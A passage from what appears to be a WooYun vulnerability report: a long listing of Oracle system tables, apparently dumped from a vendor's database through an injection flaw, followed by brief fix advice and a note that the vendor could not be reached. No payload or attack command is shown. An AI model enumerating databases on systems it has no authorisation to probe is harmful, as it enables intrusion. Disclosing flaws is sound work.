| WRH$_ACTIVE_SESSION_HISTORY |
| WRH$_ACTIVE_SESSION_HISTORY_BL |
| WRH$_BG_EVENT_SUMMARY |
| WRH$_BUFFERED_QUEUES |
| WRH$_BUFFERED_SUBSCRIBERS |
| WRH$_BUFFER_POOL_STATISTICS |
| WRH$_COMP_IOSTAT |
| WRH$_CR_BLOCK_SERVER |
| WRH$_CURRENT_BLOCK_SERVER |
| WRH$_DATAFILE |
| WRH$_DB_CACHE_ADVICE |
| WRH$_DB_CACHE_ADVICE_BL |
| WRH$_DLM_MISC |
| WRH$_DLM_MISC_BL |
| WRH$_ENQUEUE_STAT |
| WRH$_EVENT_NAME |
| WRH$_FILEMETRIC_HISTORY |
| WRH$_FILESTATXS |
| WRH$_FILESTATXS_BL |
| WRH$_INSTANCE_RECOVERY |
| WRH$_INST_CACHE_TRANSFER |
| WRH$_INST_CACHE_TRANSFER_BL |
| WRH$_JAVA_POOL_ADVICE |
| WRH$_LATCH |
| WRH$_LATCH_BL |
| WRH$_LATCH_CHILDREN |
| WRH$_LATCH_CHILDREN_BL |
| WRH$_LATCH_MISSES_SUMMARY |
| WRH$_LATCH_MISSES_SUMMARY_BL |
| WRH$_LATCH_NAME |
| WRH$_LATCH_PARENT |
| WRH$_LATCH_PARENT_BL |
| WRH$_LIBRARYCACHE |
| WRH$_LOG |
| WRH$_METRIC_NAME |
| WRH$_MTTR_TARGET_ADVICE |
| WRH$_OPTIMIZER_ENV |
| WRH$_OSSTAT |
| WRH$_OSSTAT_BL |
| WRH$_OSSTAT_NAME |
| WRH$_PARAMETER |
| WRH$_PARAMETER_BL |
| WRH$_PARAMETER_NAME |
| WRH$_PGASTAT |
| WRH$_PGA_TARGET_ADVICE |
| WRH$_PROCESS_MEMORY_SUMMARY |
| WRH$_RESOURCE_LIMIT |
| WRH$_ROWCACHE_SUMMARY |
| WRH$_ROWCACHE_SUMMARY_BL |
| WRH$_RULE_SET |
| WRH$_SEG_STAT |
| WRH$_SEG_STAT_BL |
| WRH$_SEG_STAT_OBJ |
| WRH$_SERVICE_NAME |
| WRH$_SERVICE_STAT |
| WRH$_SERVICE_STAT_BL |
| WRH$_SERVICE_WAIT_CLASS |
| WRH$_SERVICE_WAIT_CLASS_BL |
| WRH$_SESSMETRIC_HISTORY |
| WRH$_SESS_TIME_STATS |
| WRH$_SGA |
| WRH$_SGASTAT |
| WRH$_SGASTAT_BL |
| WRH$_SGA_TARGET_ADVICE |
| WRH$_SHARED_POOL_ADVICE |
| WRH$_SQLSTAT |
| WRH$_SQLSTAT_BL |
| WRH$_SQLTEXT |
| WRH$_SQL_BIND_METADATA |
| WRH$_SQL_PLAN |
| WRH$_SQL_SUMMARY |
| WRH$_SQL_WORKAREA_HISTOGRAM |
| WRH$_STAT_NAME |
| WRH$_STREAMS_APPLY_SUM |
| WRH$_STREAMS_CAPTURE |
| WRH$_STREAMS_POOL_ADVICE |
| WRH$_SYSMETRIC_HISTORY |
| WRH$_SYSMETRIC_SUMMARY |
| WRH$_SYSSTAT |
| WRH$_SYSSTAT_BL |
| WRH$_SYSTEM_EVENT |
| WRH$_SYSTEM_EVENT_BL |
| WRH$_SYS_TIME_MODEL |
| WRH$_SYS_TIME_MODEL_BL |
| WRH$_TABLESPACE_SPACE_USAGE |
| WRH$_TABLESPACE_STAT |
| WRH$_TABLESPACE_STAT_BL |
| WRH$_TEMPFILE |
| WRH$_TEMPSTATXS |
| WRH$_THREAD |
| WRH$_UNDOSTAT |
| WRH$_WAITCLASSMETRIC_HISTORY |
| WRH$_WAITSTAT |
| WRH$_WAITSTAT_BL |
| WRI$_ADV_ACTIONS |
| WRI$_ADV_ASA_RECO_DATA |
| WRI$_ADV_DEFINITIONS |
| WRI$_ADV_DEF_PARAMETERS |
| WRI$_ADV_DIRECTIVES |
| WRI$_ADV_FINDINGS |
| WRI$_ADV_JOURNAL |
| WRI$_ADV_MESSAGE_GROUPS |
| WRI$_ADV_OBJECTS |
| WRI$_ADV_OBJSPACE_CHROW_DATA |
| WRI$_ADV_OBJSPACE_TREND_DATA |
| WRI$_ADV_PARAMETERS |
| WRI$_ADV_RATIONALE |
| WRI$_ADV_RECOMMENDATIONS |
| WRI$_ADV_REC_ACTIONS |
| WRI$_ADV_SQLA_FAKE_REG |
| WRI$_ADV_SQLA_MAP |
| WRI$_ADV_SQLA_STMTS |
| WRI$_ADV_SQLA_TMP |
| WRI$_ADV_SQLT_BINDS |
| WRI$_ADV_SQLT_PLANS |
| WRI$_ADV_SQLT_RTN_PLAN |
| WRI$_ADV_SQLT_STATISTICS |
| WRI$_ADV_SQLW_COLVOL |
| WRI$_ADV_SQLW_STMTS |
| WRI$_ADV_SQLW_SUM |
| WRI$_ADV_SQLW_TABLES |
| WRI$_ADV_SQLW_TABVOL |
| WRI$_ADV_TASKS |
| WRI$_ADV_USAGE |
| WRI$_AGGREGATION_ENABLED |
| WRI$_ALERT_HISTORY |
| WRI$_ALERT_OUTSTANDING |
| WRI$_ALERT_THRESHOLD |
| WRI$_ALERT_THRESHOLD_LOG |
| WRI$_DBU_CPU_USAGE |
| WRI$_DBU_CPU_USAGE_SAMPLE |
| WRI$_DBU_FEATURE_METADATA |
| WRI$_DBU_FEATURE_USAGE |
| WRI$_DBU_HIGH_WATER_MARK |
| WRI$_DBU_HWM_METADATA |
| WRI$_DBU_USAGE_SAMPLE |
| WRI$_OPTSTAT_AUX_HISTORY |
| WRI$_OPTSTAT_HISTGRM_HISTORY |
| WRI$_OPTSTAT_HISTHEAD_HISTORY |
| WRI$_OPTSTAT_IND_HISTORY |
| WRI$_OPTSTAT_OPR |
| WRI$_OPTSTAT_TAB_HISTORY |
| WRI$_SCH_CONTROL |
| WRI$_SCH_VOTES |
| WRI$_SEGADV_CNTRLTAB |
| WRI$_SEGADV_OBJLIST |
| WRI$_SQLSET_BINDS |
| WRI$_SQLSET_DEFINITIONS |
| WRI$_SQLSET_MASK |
| WRI$_SQLSET_PLANS |
| WRI$_SQLSET_PLANS_TOCAP |
| WRI$_SQLSET_PLAN_LINES |
| WRI$_SQLSET_REFERENCES |
| WRI$_SQLSET_STATEMENTS |
| WRI$_SQLSET_STATISTICS |
| WRI$_SQLSET_WORKSPACE |
| WRI$_TRACING_ENABLED |
| WRM$_BASELINE |
| WRM$_DATABASE_INSTANCE |
| WRM$_SNAPSHOT |
| WRM$_SNAP_ERROR |
| WRM$_WR_CONTROL |
| WRR$_CAPTURES |
| WRR$_CAPTURE_STATS |
| WRR$_FILTERS |
| _DEFAULT_AUDITING_OPTIONS_ |
+--------------------------------+

修复方案:

过滤,一定要重视安全,快修复吧~

版权声明:转载请注明来源 adm1n@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论